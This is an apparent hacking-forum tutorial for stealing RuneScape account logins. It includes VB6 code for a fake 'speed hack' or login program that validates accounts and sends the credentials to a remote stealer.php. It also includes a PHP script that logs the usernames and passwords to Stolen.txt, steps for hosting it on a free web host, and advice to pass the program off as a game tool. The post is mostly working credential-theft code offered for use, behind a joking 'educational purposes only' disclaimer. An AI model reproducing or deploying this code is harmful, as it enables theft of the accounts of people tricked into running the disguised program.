ok theres many parts of this tut. (i made it as noob friendly as possible)
VB6:
you need an program to attach this to for one (if your in it for the cash make it an fake aber or just edit the login code of a public one)
Code:
Dim HTML As String
HTML = ""
HTML = ("put the login for what site ur useing here")
If InStr(HTML, "You are logged in as") Then
MsgBox ("Account Valid")
Inet1.OpenURL ("ur url to your uploaded stealer.php make sue you enter in varibles")
YOURFAKEFORM.Show
Else
MsgBox ("Invalid Account, try again, nub")
End If
put that for the login of some amazing speed hack or somthing -_-
the above one is used for runescape2 (pm me if you want me to make you a custom one, i charge) as you see it also checks accounts so you only get valid ones.
PHP:
PHP Code:
<?php
$username = $_GET['username'];
$password = $_GET['password'];
$file = "Stolen.txt";
$fhandle = fopen($file, 'a+');
fwrite($fhandle, "+++++++++++++++++++++++++++++++++++++++++++");
fwrite($fhandle, "\n");
fwrite($fhandle, "Dustyßottems PHP logger");
fwrite($fhandle, "\n");
fwrite($fhandle, "Username: ");
fwrite($fhandle, $username);
fwrite($fhandle, "\n");
fwrite($fhandle, "Password: ");
fwrite($fhandle, $password);
fwrite($fhandle, "\n");
fwrite($fhandle, "+++++++++++++++++++++++++++++++++++++++++++");
fwrite($fhandle, "\n");
fwrite($fhandle, "\n");
fclose($fhandle);
?>
upload that an the file it uses to an php friendly host and record down the links needed (this is why schools should teach php ;))
HOST:
ok easyish part go to 1111mb get a domain (free) and then upload the files needed...
should look like this:
so preety much a summery... you make a new program, you should already have your host and the 2 php files uploaded, you make it so that after it logins it will open his url of the stealer.php link in your host filling in the varibles...
NjoY
(educationl purposes only ;))
you use this and submit it to a forum for others to download and don't clearly state what it is, one you get sued, two you get ddosed by me
